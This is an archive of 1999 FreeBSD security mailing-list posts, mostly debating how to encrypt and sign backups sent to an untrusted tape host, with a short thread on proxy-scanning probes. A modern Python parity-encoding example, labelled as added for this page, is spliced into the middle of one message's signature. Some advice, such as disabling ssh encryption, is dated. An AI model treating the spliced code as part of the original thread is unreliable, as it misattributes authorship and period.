each | > file separately as I go, so that a corrupted byte affects only one file on | > retrieval. Is there an existing way to do this, or should I hack tar or dump | > into doing it? | > | > | > | > To Unsubscribe: send mail to majordomo@FreeBSD.org | > with "unsubscribe freebsd-security" in the body of the message | > | | | | | To Unsubscribe: send mail to majordomo@FreeBSD.org | with "unsubscribe freebsd-security" in the body of the message -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 19:19:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id 6932315059 for ; Sun, 16 May 1999 19:19:24 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id WAA01918; Sun, 16 May 1999 22:33:23 -0400 (EDT) Date: Sun, 16 May 1999 22:33:23 -0400 
From: Adam Shostack
To: nr1@ihug.co.nz
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: secure backup
Message-ID: <19990516223322.B1851@weathership.homeport.org>
References: <199905170014.MAA18766@smtp1.ihug.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.3i
In-Reply-To: <199905170014.MAA18766@smtp1.ihug.co.nz>; from nr1@ihug.co.nz on Mon, May 17, 1999 at 12:14:19PM +1200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

You're worried about errors on the tape, I presume? You could pipe the output of pgp through something that does redundant encoding, such that errors on the tape are recoverable outside the tape. There are some direct tradeoffs that you can find between bloat and recoverability; as you add bits, your odds of being able to reconstruct increase.

Adam

On Mon, May 17, 1999 at 12:14:19PM +1200, nr1@ihug.co.nz wrote:
| Can anyone recommend how I should go about creating a backup to an untrusted
| machine that has the tape drive, and using an untrusted network.
|
| I'm a bit wary of encrypting the output of tar or dump, as a single byte error
| would make the rest of the backup useless. I'd like to encrypt (pgp?) each
| file separately as I go, so that a corrupted byte affects only one file on
| retrieval. Is there an existing way to do this, or should I hack tar or dump
| into doing it?

--
"It is seldom that liberty of any kind is lost all at once."
-Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 20:14:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id DEDFD1548A for ; Sun, 16 May 1999 20:14:29 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id MAA23046; Mon, 17 May 1999 12:44:27 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA01394; Mon, 17 May 1999 12:45:09 +0930 Date: Mon, 17 May 1999 12:45:09 +0930 (CST) 
From: Kris Kennaway
X-Sender: kkennawa@bragg
To: Adam Shostack
Cc: nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG
Subject: Re: secure backup
In-Reply-To: <19990516223322.B1851@weathership.homeport.org>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, 16 May 1999, Adam Shostack wrote:

> You're worried about errors on the tape, I presume? You could
> pipe the output of pgp through something that does redundant encoding,
> such that errors on the tape are recoverable outside the tape. There
> are some direct tradeoffs that you can find between bloat and
> recoverability; as you add bits, your odds of being able to
> reconstruct increase.

Pipe the output of dump or tar or whatever you're using through bdes(1). You don't need the overhead of PGP unless you want a trusted third party to read the backup without knowing the encryption key. Pass the data through three rounds of bdes doing an encrypt, decrypt, followed by encrypt (with different keys, of course) and you've got yourself 3DES, which bdes doesn't seem to do natively. Make the keys random, and stick those in a PGP file if you like.

Hmm, there seems to be a void of any general-purpose tools which provide error-correcting data encoding - but in this case do you really need it? It'll only multiply the size of your backup, and if you're using a reliable transport protocol between client and server (i.e. TCP) then this shouldn't be an issue. If your tape is dropping bits, then it would be a big problem if you were using it in the normal way (attached to local computer). I suppose the untrusted server could cause your data stream to be corrupted, but they could also cause it to never make the tape in the first place.
Transport the data stream to the server using ssh -c none (no need for the overhead of another encryption layer unless you're really paranoid) - this still authenticates via RSA, so you have at least some assurance that no-one else can be sending data to the tape except you (the backup server process could have been silently replaced, so you don't actually know that your data is going to the tape, but I don't think it'd be easy to verify this).

Of course, a malicious (super-)user could reverse-engineer the backup process on the server and modify it to nullify ANY authentication measures (easy if this is a shell script) - so you can't really be sure that no-one else is writing data onto the tape, only that the data you do write which ends up on the tape is secure from decryption.

In summary, there's only so much you can do if you don't trust the server - you still have to trust them to provide basic functions like actually writing your data to the tape.

Kris

>
> Adam
>
>
> On Mon, May 17, 1999 at 12:14:19PM +1200, nr1@ihug.co.nz wrote:
> | Can anyone recommend how I should go about creating a backup to an untrusted
> | machine that has the tape drive, and using an untrusted network.
> |
> | I'm a bit wary of encrypting the output of tar or dump, as a single byte error
> | would make the rest of the backup useless. I'd like to encrypt (pgp?) each
> | file separately as I go, so that a corrupted byte affects only one file on
> | retrieval. Is there an existing way to do this, or should I hack tar or dump
> | into doing it?
>
> --
> "It is seldom that liberty of any kind is lost all at once."
> -Hume

-----
"That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye"
"Wow, that's sharp!"
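Adam's suggestion of a redundant encoding layered over the encrypted stream, and Kris's point that it multiplies the size of the backup, as an added example in Python written for this page (not code from the thread, from any of its authors, or from any FreeBSD tool). It cuts the stream into fixed-size frames with a CRC-32 each and adds one XOR parity frame per stripe of K data frames, so one damaged frame per stripe is rebuilt and the overhead is about 1/K. The frame size, stripe width and header layout are assumed values chosen for the illustration; a production tool would use a Reed-Solomon code to survive more than one bad frame per stripe.

```python
"""XOR-parity redundancy for a backup stream, with a CRC per frame.

Added example for this page; not code from the thread or from any FreeBSD tool.
The stream is cut into fixed-size frames, each carrying a CRC-32 so a damaged
frame is recognised instead of restored silently, and every K data frames are
followed by one XOR parity frame, so a single bad frame per stripe can be
rebuilt from the other K.  Fixed-size frames mean a damaged header never
desynchronises the reader: a frame's role follows from its position.
Cost: one extra frame per K data frames, plus two length frames.
"""
import math
import struct
import zlib
from typing import Optional, Tuple

BLOCK = 512                     # payload bytes per frame (assumed; tar's block size)
K = 4                           # data frames per stripe -> 1/K parity overhead
HDR = struct.Struct(">IBI")     # stripe number, kind, CRC-32 over (stripe, kind, payload)
FRAME = HDR.size + BLOCK
DATA, PARITY, SUPER = 0, 1, 2   # frame kinds; SUPER carries the stream length


def _xor(a: bytes, b: bytes) -> bytes:
    return (int.from_bytes(a, "big") ^ int.from_bytes(b, "big")).to_bytes(len(a), "big")


def _frame(stripe: int, kind: int, payload: bytes) -> bytes:
    payload = payload.ljust(BLOCK, b"\0")
    crc = zlib.crc32(struct.pack(">IB", stripe, kind) + payload)
    return HDR.pack(stripe, kind, crc) + payload


def _check(frame: bytes, stripe: int, kind: int) -> Optional[bytes]:
    """Payload of a frame whose header and CRC match what belongs in this slot, else None."""
    if len(frame) != FRAME:
        return None
    s, k, crc = HDR.unpack_from(frame)
    payload = frame[HDR.size:]
    if (s, k) != (stripe, kind) or zlib.crc32(struct.pack(">IB", s, k) + payload) != crc:
        return None
    return payload


def encode(data: bytes) -> bytes:
    """SUPER | per stripe: up to K DATA frames + 1 PARITY frame | SUPER (length kept twice)."""
    superblock = _frame(0, SUPER, struct.pack(">Q", len(data)))
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    out = bytearray(superblock)
    for s in range(0, len(blocks), K):
        stripe, parity = s // K, bytes(BLOCK)
        for b in blocks[s:s + K]:
            f = _frame(stripe, DATA, b)
            out += f
            parity = _xor(parity, f[HDR.size:])
        out += _frame(stripe, PARITY, parity)
    return bytes(out + superblock)


def decode(encoded: bytes) -> Tuple[bytes, int]:
    """Return (data, frames_rebuilt); raise ValueError if a stripe lost more than parity covers."""
    frames = [encoded[i:i + FRAME] for i in range(0, len(encoded), FRAME)]

    def get(i: int) -> bytes:            # tolerate a truncated stream
        return frames[i] if 0 <= i < len(frames) else b""

    hdr = _check(get(0), 0, SUPER) or _check(get(len(frames) - 1), 0, SUPER)
    if hdr is None:
        raise ValueError("both length frames damaged")
    (total,) = struct.unpack_from(">Q", hdr)
    nblocks = math.ceil(total / BLOCK)
    out, rebuilt, pos = [], 0, 1
    for stripe in range(math.ceil(nblocks / K)):
        n = min(K, nblocks - stripe * K)
        slots = [_check(get(pos + i), stripe, DATA) for i in range(n)]
        parity = _check(get(pos + n), stripe, PARITY)
        pos += n + 1
        missing = [i for i, p in enumerate(slots) if p is None]
        if len(missing) == 1 and parity is not None:
            # parity XOR the surviving data frames gives back the lost one
            fix = parity
            for i, p in enumerate(slots):
                if i != missing[0]:
                    fix = _xor(fix, p)
            slots[missing[0]] = fix
            rebuilt += 1
        elif missing:
            raise ValueError("stripe %d: %d damaged data frame(s), parity %s"
                             % (stripe, len(missing), "damaged" if parity is None else "intact"))
        out.extend(slots)
    return b"".join(out)[:total], rebuilt


def overhead(nbytes: int) -> float:
    """Encoded size over input size: about (K+1)/K, plus the two fixed length frames."""
    return len(encode(bytes(nbytes))) / nbytes
```

Run it over the output of pgp or bdes, not under it: the parity has to protect the ciphertext that actually lands on the tape, and a frame rebuilt from parity is bit-exact, so decryption afterwards sees nothing unusual. decode() raises rather than returning partially repaired data when a stripe has lost more than one frame, which is the behaviour you want from a restore job.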
- Ace Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 21:46:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from xanadu.io.com (xanadu.io.com [199.170.88.102]) by hub.freebsd.org (Postfix) with ESMTP id DAD3814D4A for ; Sun, 16 May 1999 21:46:25 -0700 (PDT) (envelope-from zippo@caffeine.io.com) Received: from caffeine.io.com (zippo@caffeine.io.com [199.170.88.30]) by xanadu.io.com (8.9.3/8.9.3) with ESMTP id XAA28993 for ; Sun, 16 May 1999 23:47:11 -0500 Received: (from zippo@localhost) by caffeine.io.com (8.9.0/8.9.0) id XAA03260 for freebsd-security@FreeBSD.ORG; Sun, 16 May 1999 23:48:27 -0500 Message-ID: <19990516234827.A2021@io.com> Date: Sun, 16 May 1999 23:48:27 -0500 
From: "Isaac D. Kishk"
To: freebsd-security@FreeBSD.ORG
Subject: Re: secure backup
References: <199905170014.MAA18766@smtp1.ihug.co.nz> <199905170151.UAA04558@alecto.physics.uiuc.edu> <19990516222325.A1851@weathership.homeport.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <19990516222325.A1851@weathership.homeport.org>; from Adam Shostack on Sun, May 16, 1999 at 10:23:25PM -0400
X-URL: http://www.io.com/~kazi
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Small fundamental question... how would you trust the tape if the machine the tape is attached to is untrusted?

Adam Shostack emailed the following on Sun, May 16, 1999 at 10:23:25PM -0400:

[ ssh does not help; the host the tape is attached to is untrusted.
[
[ Adam
[
[ On Sun, May 16, 1999 at 08:51:19PM -0500, Igor Roshchin wrote:
[ |
[ |
[ | If both machines are Unix - you can use SSH.
[ |
[ | I am using the following script:
[ | (from the machine that I back up)
[ | (Written for FreeBSD - so, you might want to optimize it differently -
[ | if you are using some other Unix - you might want to adjust the size of the buffer)
[ |
[ | -------------------------------
[ | #!/bin/csh -f
[ | #
[ | set SSH="ssh -c none -i /local-path-to-private/key backup@tape-machine.com /bin/dd bs=64k of=/dev/nrst0"
[ | echo starting MyMachine
[ | date
[ | dump 0ubsdf 64 61000 100000 - / | /bin/dd bs=64k | $SSH
[ | dump 0ubsdf 64 61000 100000 - /usr | /bin/dd bs=64k | $SSH
[ | dump 0ubsdf 64 61000 100000 - /var | /bin/dd bs=64k | $SSH
[ | dump 0ubsdf 64 61000 100000 - /mail | /bin/dd bs=64k | $SSH
[ | --------------------------------
[ |
[ |
[ | (backup - is the account of the user on the machine "tape-machine.com" -
[ | the one which has the tape drive attached)
[ |
[ | Hope, this helps,
[ |
[ | IgoR
[ |
[ | > Can anyone recommend how I should go about creating a backup to an untrusted
[ | > machine that has the tape drive, and using an untrusted
network. [ | > [ | > I'm a bit wary of encrypting the output of tar or dump, as a single byte error [ | > would make the rest of the backup useless. I'd like to encrypt (pgp?) each [ | > file separately as I go, so that a corrupted byte affects only one file on [ | > retrieval. Is there an existing way to do this, or should I hack tar or dump [ | > into doing it? [ | > [ | > [ | > [ | > To Unsubscribe: send mail to majordomo@FreeBSD.org [ | > with "unsubscribe freebsd-security" in the body of the message [ | > [ | [ | [ | [ | [ | To Unsubscribe: send mail to majordomo@FreeBSD.org [ | with "unsubscribe freebsd-security" in the body of the message [ [ -- [ "It is seldom that liberty of any kind is lost all at once." [ -Hume [ [ [ [ [ To Unsubscribe: send mail to majordomo@FreeBSD.org [ with "unsubscribe freebsd-security" in the body of the message -- /****************************************************** ***** /\ **** Isaac D. Kishk - IDK5 - zippo@io.com *** **** / \ *** Senior Network / Systems Administrator ** *** / () \ ** http://www.io.com/~zippo **************** ** /______\ * 512.462.0999 - 512.462.0356(fax) ******** ******************************************************/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 21:54:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp.enteract.com (thor.enteract.com [207.229.143.11]) by hub.freebsd.org (Postfix) with SMTP id B004F151F5 for ; Sun, 16 May 1999 21:54:26 -0700 (PDT) (envelope-from dscheidt@enteract.com) Received: (qmail 28226 invoked from network); 17 May 1999 04:54:25 -0000 Received: from shell-2.enteract.com (dscheidt@207.229.143.41) by thor.enteract.com with SMTP; 17 May 1999 04:54:25 -0000 Received: from localhost (dscheidt@localhost) by shell-2.enteract.com (8.9.3/8.9.2) with SMTP id XAA42878; Sun, 16 May 1999 23:54:25 -0500 (CDT) (envelope-from dscheidt@enteract.com) 
X-Authentication-Warning: shell-2.enteract.com: dscheidt owned process doing -bs
Date: Sun, 16 May 1999 23:54:25 -0500 (CDT)
From: David Scheidt
To: "Isaac D. Kishk"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: secure backup
In-Reply-To: <19990516234827.A2021@io.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, 16 May 1999, Isaac D. Kishk wrote:

:Small fundamental question... how would you trust the tape if the machine
:the tape is attached to is untrusted?
:

I can see situations where you can trust that the tape will be made properly, but can't trust that someone won't have a look at the data while it crosses the wire, is on the tape host, or on the tape. A remote datacenter is one likely possibility.

David

From owner-freebsd-security Mon May 17 3:16:18 1999
Delivered-To: freebsd-security@freebsd.org
Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id 01F7A14A2F for ; Mon, 17 May 1999 03:16:16 -0700 (PDT) (envelope-from jeroen@vangelderen.org)
Received: from wit395301.student.utwente.nl ([130.89.235.121]:35597 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <8020-32302>; Mon, 17 May 1999 12:15:58 +0200
Message-ID: <373FEC63.D579485D@vangelderen.org>
Date: Mon, 17 May 1999 12:16:03 +0200
From: "Jeroen C. van Gelderen"
X-Mailer: Mozilla 4.51 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Kris Kennaway
Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG
Subject: Re: secure backup
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Kris Kennaway wrote:
>
> On Sun, 16 May 1999, Adam Shostack wrote:
>
> > You're worried about errors on the tape, I presume? You could
> > pipe the output of pgp through something that does redundant
> > encoding, such that errors on the tape are recoverable outside
> > the tape. There are some direct tradeoffs that you can find
> > between bloat and recoverability; as you add bits, your odds
> > of being able to reconstruct increase.
>
> Pipe the output of dump or tar or whatever you're using through
> bdes(1). You don't need the overhead of PGP unless you want a
> trusted third party to read the backup without knowing the
> encryption key.

PGP provides a password-based encryption mode; just use that, and you will still benefit from PGP's compression and checksumming facilities.

> Pass the data through three
> rounds of bdes doing an encrypt, decrypt, followed by encrypt (with different
> keys, of course) and you've got yourself 3DES, which bdes doesn't seem to do
> natively. Make the keys random, and stick those in a PGP file if you like.

If you assume PGP is available, why not just use it? Using bdes(1) in this setup sounds way more complicated (thus error-prone) to me.

> Transport the data stream to the server using ssh -c none (no need for the
> overhead of another encryption layer unless you're really paranoid)

Just being cautious is enough. Adding a layer of SSH encryption will at least thwart offline dictionary attacks on the backup passphrase. Encryption is cheap; why disable it if you don't have to?

Cheers,
Jeroen
--
Jeroen C.
van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:10:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from idea.co.uk (ultra2.idea.co.uk [194.36.20.11]) by hub.freebsd.org (Postfix) with ESMTP id CAA4B14BF4 for ; Mon, 17 May 1999 06:09:15 -0700 (PDT) (envelope-from kiril@idea.co.uk) Received: (from kiril@localhost) by idea.co.uk (8.9.2/8.9.2) id OAA01246 for freebsd-security@FreeBSD.ORG; Mon, 17 May 1999 14:04:43 +0100 (BST) 
From: Kiril Mitev
Message-Id: <199905171304.OAA01246@idea.co.uk>
Subject: Re: network scan?
To: freebsd-security@FreeBSD.ORG
Date: Mon, 17 May 1999 14:04:43 +0100 (BST)
In-Reply-To: <373E46FD.72E41F3F@softweyr.com> from "Wes Peters" at May 15, 99 10:18:05 pm
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>
> Harold Gutch wrote:
> >
> > On Sun, May 16, 1999 at 04:41:56AM +0800, Peter Wemm wrote:
> > > Kris Kennaway wrote:
> > > > On Wed, 12 May 1999, Matthew Dillon wrote:
> > > >
> > > > > :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359
> > > > > :a.b.c.1:1080 in via ed0
> > > > > :...
> > > > >
> > > > > I get this all the time from people scanning for netbios. I
> > > > > usually just ignore them. If I'm in a bad mood I send a nasty gram
> > > > > to the originating network.
> > > >
> > > > In this case they're looking for an open SOCKS proxy (so they can use it to
> > >
> > > In this particular case, it's a site in China. They have a heavily
> > > censored internet gateway, and I see lots of probes from china (and other
> > > areas in Asia that have enforced proxy use and heavily censored feeds)
> > > looking for *:1080 (socks), *:3128 (squid) and *:8080 (squid and/or other
> > > proxies including netscape). They are scanning for relays to bounce
> > > connections off to bypass the censored feed.
> >
> > Just to make sure I'm getting this right - you're saying China
> > has a censored internet gateway (i.e. blocking *something* [what
> > exactly ?] ), but they do allow connections to ports 1080, 3128
> > and 8080 ?
>
> They block access to sites, not to ports. In particular, sites that
> carry capitalist misinformation, or what we in the free world call
> "news."

Hmm, but who can tell where EXACTLY *they* are trying to go to?
As in, can you see things like 'www.abc.com' and such ? Or is it more along the lines of www.max-XXX.org - you get the idea ? Just wondering out loud... K To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:15:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id E920214CE9 for ; Mon, 17 May 1999 06:15:31 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id JAA02326; Mon, 17 May 1999 09:29:33 -0400 (EDT) Date: Mon, 17 May 1999 09:29:33 -0400
From: Adam Shostack To: "Isaac D. Kishk" Cc: freebsd-security@FreeBSD.ORG Subject: Re: secure backup Message-ID: <19990517092933.A2322@weathership.homeport.org> References: <199905170014.MAA18766@smtp1.ihug.co.nz> <199905170151.UAA04558@alecto.physics.uiuc.edu> <19990516222325.A1851@weathership.homeport.org> <19990516234827.A2021@io.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <19990516234827.A2021@io.com>; from Isaac D. Kishk on Sun, May 16, 1999 at 11:48:27PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

You don't need to. The data is encrypted and signed. (That's the benefit of using pgp over bdes; you can sign the data as it goes to tape.)

Adam

On Sun, May 16, 1999 at 11:48:27PM -0500, Isaac D. Kishk wrote:
|
| Small fundamental question... how would you trust the tape if the machine
| the tape is attached to is untrusted?
|
| Adam Shostack emailed the following on Sun, May 16, 1999 at 10:23:25PM -0400:
|
| [ ssh does not help; the host the tape is attached to is untrusted.
| [
| [ Adam
| [
| [ On Sun, May 16, 1999 at 08:51:19PM -0500, Igor Roshchin wrote:
| [ |
| [ |
| [ | If both machines are Unix - you can use SSH.
| [ |
| [ | I am using the following script:
| [ | (from the machine that I back up)
| [ | (Written for FreeBSD - so, you might want to optimize it differently -
| [ | if you are using some other Unix - you might want to adjust the size of the buffer)
| [ |
| [ | -------------------------------
| [ | #!/bin/csh -f
| [ | #
| [ | set SSH="ssh -c none -i /local-path-to-private/key backup@tape-machine.com /bin/dd bs=64k of=/dev/nrst0"
| [ | echo starting MyMachine
| [ | date
| [ | dump 0ubsdf 64 61000 100000 - / | /bin/dd bs=64k | $SSH
| [ | dump 0ubsdf 64 61000 100000 - /usr | /bin/dd bs=64k | $SSH
| [ | dump 0ubsdf 64 61000 100000 - /var | /bin/dd bs=64k | $SSH
| [ | dump 0ubsdf 64 61000 100000 - /mail | /bin/dd bs=64k | $SSH
| [ | --------------------------------
| [ |
| [ |
| [ | (backup - is the account of the user on the machine "tape-machine.com" -
| [ | the one which has the tape drive attached)
| [ |
| [ | Hope this helps,
| [ |
| [ | IgoR
| [ |
| [ | > Can anyone recommend how I should go about creating a backup to an untrusted
| [ | > machine that has the tape drive, and using an untrusted network.
| [ | >
| [ | > I'm a bit wary of encrypting the output of tar or dump, as a single byte error
| [ | > would make the rest of the backup useless. I'd like to encrypt (pgp?) each
| [ | > file separately as I go, so that a corrupted byte affects only one file on
| [ | > retrieval. Is there an existing way to do this, or should I hack tar or dump
| [ | > into doing it?
| [ | >
| [ | >
| [ | >
| [ | > To Unsubscribe: send mail to majordomo@FreeBSD.org
| [ | > with "unsubscribe freebsd-security" in the body of the message
| [ | >
| [ |
| [ |
| [ |
| [ |
| [ | To Unsubscribe: send mail to majordomo@FreeBSD.org
| [ | with "unsubscribe freebsd-security" in the body of the message
| [
| [ --
| [ "It is seldom that liberty of any kind is lost all at once."
| [ -Hume
| [
| [
| [
| [
| [ To Unsubscribe: send mail to majordomo@FreeBSD.org
| [ with "unsubscribe freebsd-security" in the body of the message
|
| --
| /******************************************************
| ***** /\ **** Isaac D. Kishk - IDK5 - zippo@io.com ***
| **** / \ *** Senior Network / Systems Administrator **
| *** / () \ ** http://www.io.com/~zippo ****************
| ** /______\ * 512.462.0999 - 512.462.0356(fax) ********
| ******************************************************/
|
|
| To Unsubscribe: send mail to majordomo@FreeBSD.org
| with "unsubscribe freebsd-security" in the body of the message

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon May 17 6:18:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id D73E814CCD for ; Mon, 17 May 1999 06:18:22 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id JAA02339; Mon, 17 May 1999 09:31:43 -0400 (EDT) Date: Mon, 17 May 1999 09:31:43 -0400
From: Adam Shostack To: Kris Kennaway Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup Message-ID: <19990517093143.B2322@weathership.homeport.org> References: <19990516223322.B1851@weathership.homeport.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: ; from Kris Kennaway on Mon, May 17, 1999 at 12:45:09PM +0930 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 17, 1999 at 12:45:09PM +0930, Kris Kennaway wrote: | On Sun, 16 May 1999, Adam Shostack wrote: | | > You're worried about errors on the tape, I presume? You could | > pipe the output of pgp through something that does redundant encoding, | > such that errors on the tape are recoverable outside the tape. There | > are some direct tradeoffs that you can find between bloat and | > recoverability; as you add bits, your odds of being able to | > reconstruct increase. | | Pipe the output of dump or tar or whatever you're using through bdes(1). You | don't need the overhead of PGP unless you want a trusted third party to read | the backup without knowing the encryption key. Pass the data through three | rounds of bdes doing an encrypt, decrypt, followed by encrypt (with different | keys, of course) and you've got yourself 3DES, which bdes doesn't seem to do | natively. Make the keys random, and stick those in a PGP file if you like. | | Hmm, there seems to be a void of any general-purpose tools which provide | error-correcting data encoding - but in this case do you really need it? | It'll only multiply the size of your backup, and if you're using a reliable | transport protocol between client and server (i.e. TCP) then this shouldn't be | an issue. If your tape is dropping bits, then it would be a big problem if you | were using it in the normal way (attached to local computer). 
I suppose the | untrusted server could cause your data stream to be corrupted, but they could | also cause it to never make the tape in the first place. If the tape is unreliable, and you lose a few bits of a plaintext file, you've lost a few bits. If it's a few bits of an encrypted and compressed file, you may lose the whole file. | ther server and modify it to nullify ANY authentication measures (easy if this | is a shell script) - so you can't really be sure that no-one else is writing | data onto the tape, only that the data you do write which ends up on the tape | is secure from decryption. No, if you use pgp, you can sign the data on your local (trusted) machine, and only be vulnerable to a DOS attack, not authentication attacks. | In summary, there's only so much you can do if you don't trust the server - | you still have to trust them to provide basic functions like actually writing | your data to the tape. This is correct. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:20:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 0CD701515E for ; Mon, 17 May 1999 06:20:29 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id WAA26306; Mon, 17 May 1999 22:50:28 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA31149; Mon, 17 May 1999 22:51:17 +0930 Date: Mon, 17 May 1999 22:51:14 +0930 (CST)
From: Kris Kennaway X-Sender: kkennawa@bragg To: "Jeroen C. van Gelderen" Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup In-Reply-To: <373FEC63.D579485D@vangelderen.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 17 May 1999, Jeroen C. van Gelderen wrote: > Kris Kennaway wrote: > > > > On Sun, 16 May 1999, Adam Shostack wrote: > > > > > You're worried about errors on the tape, I presume? You could > > > pipe the output of pgp through something that does redundant > > > encoding, such that errors on the tape are recoverable outside > > > the tape. There are some direct tradeoffs that you can find > > > between bloat and recoverability; as you add bits, your odds > > > of being able to reconstruct increase. > > > > Pipe the output of dump or tar or whatever you're using through > > bdes(1). You don't need the overhead of PGP unless you want a > > trusted third party to read the backup without knowing the > > encryption key. > > PGP provides a password based encryption mode, just use that, you will > still benefit from PGPs compression and checksumming facilities. Didn't know that. What cipher does it use? > > Pass the data through three > > rounds of bdes doing an encrypt, decrypt, followed by encrypt (with different > > keys, of course) and you've got yourself 3DES, which bdes doesn't seem to do > > natively. Make the keys random, and stick those in a PGP file if you like. > > If you assume PGP is available, why not just use it? Using bdes(1) in > this setup sounds way more complicated (thus error-prone) to me. There's no /need/ to use PGP in this step - clearly you could do anything you like with the local keys, such as printing them out, or storing them as plaintext (or keeping a constant key used for multiple backups). 
